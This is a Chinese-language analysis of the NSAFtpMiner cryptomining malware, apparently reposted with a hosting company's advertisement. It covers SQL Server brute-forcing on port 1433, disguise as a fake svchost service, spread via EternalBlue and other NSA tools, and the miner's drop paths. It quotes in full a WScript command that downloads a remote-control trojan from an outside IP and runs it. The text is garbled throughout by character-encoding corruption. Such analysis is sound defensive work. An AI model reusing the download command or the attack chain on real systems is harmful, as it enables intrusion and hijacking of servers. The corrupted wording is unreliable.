中毒表現(xiàn)：

1，cpu跑到100%，服務器非?？?，基本操作不了，所有提供服務無法正常運行。

2，進程中有win1ogins.exe,中間是數(shù)字1 不是字母l.描述是cpu挖礦。右鍵無法打開文件位置。

3，斷網(wǎng)情況下無法挖礦，CPU占用回下來。

使用360掃描殺毒，可以發(fā)現(xiàn)釋放文件help.dll

原理：黑客通過1433端口爆破入侵SQL Server服務器，再植入遠程控制木馬并安裝為系統(tǒng)服務，然后利用遠程控制木馬進一步加載挖礦木馬進行挖礦。

NSAFtpMiner攻擊流程

1433爆破手礦工（NSAFtpMiner）有如下特點：

1.利用密碼字典爆破1433端口登錄；

2.木馬偽裝成系統(tǒng)服務，COPY自身到c:\windows\svchost.exe，創(chuàng)建服務“Server Remote”；

3.利用NSA武器庫工具包掃描入侵內(nèi)網(wǎng)開放445/139端口的計算機；

4.使用了NSA武器中的多個工具包Eternalblue(永恒之藍)、Doubleplsar(雙脈沖星)、EternalChampion(永恒冠軍)、Eternalromance（永恒浪漫）、Esteemaudit（RDP漏洞攻擊）；

5.遠程控制木馬創(chuàng)建“FTP系統(tǒng)核心服務”，提供FTP服務，供內(nèi)網(wǎng)其他被入侵的電腦進行病毒庫更新；

6.下載挖礦程序在局域網(wǎng)組網(wǎng)挖取門羅幣。

黑客針對1433端口爆破成功后在受害機器執(zhí)行命令：

“C:\Windows\System32\WScript.exe” “C:\ProgramData\vget.vbs” hxxp://221.229.204.120:7423/clem.exe C:/ProgramData/clem.exe
將遠程控制木馬植入。

clem.exe運行后拷貝自身到C:\windows\svchost.exe，并創(chuàng)建服務“Server Remote”。

遠程控制木馬clem.exe接收指令下載NSA攻擊模塊主程序ru.exe，ru.exe運行后在C:\Program Files\Windowsd 釋放72個子文件。

黑客攻擊時先關閉防火墻，然后啟動Fileftp.exe掃描內(nèi)網(wǎng)機器的445/139端口，如果端口處于打開狀態(tài)則利用多個NSA武器工具（Eternalblue等）對目標機器進行攻擊。若攻擊成功，則根據(jù)不同系統(tǒng)版本在受害機器上執(zhí)行payload(x86/x64.dll),x86/x64.dll執(zhí)行后釋放出runsum.exe并安裝執(zhí)行，runsum.exe功能同最初的遠程控制模塊clem.exe相同，接收指令下載挖礦模塊和NSA攻擊模塊進行挖礦攻擊和繼續(xù)感染。

使用kill.bat、Pkill.dll對攻擊進程進行清除。

遠程控制木馬clem.exe下載挖礦模塊xxs.exe，xxs.exe運行后釋放help.dll到C:\Windows\Fonts\sysIntl。

help.dll釋放礦機程序win1ogins.exe到以下目錄：

C:\Windows\Help\

C:\Windows\PLA\system\

C:\Windows\Fonts\system(x64)\

C:\Windows\Fonts\system(x86)\

C:\Windwos\dell\

河南億恩科技股份有限公司(mszdt.com)始創(chuàng)于2000年，專注服務器托管租用，是國家工信部認定的綜合電信服務運營商。億恩為近五十萬的用戶提供服務器托管、服務器租用、機柜租用、云服務器、網(wǎng)站建設、網(wǎng)站托管等網(wǎng)絡基礎服務，另有網(wǎng)總管、名片俠網(wǎng)絡推廣服務，使得客戶不斷的獲得更大的收益。
服務器/云主機 24小時售后服務電話：0371-60135900
虛擬主機/智能建站 24小時售后服務電話：0371-55621053
網(wǎng)絡版權侵權舉報電話：0371-60135995
服務熱線：0371-60135900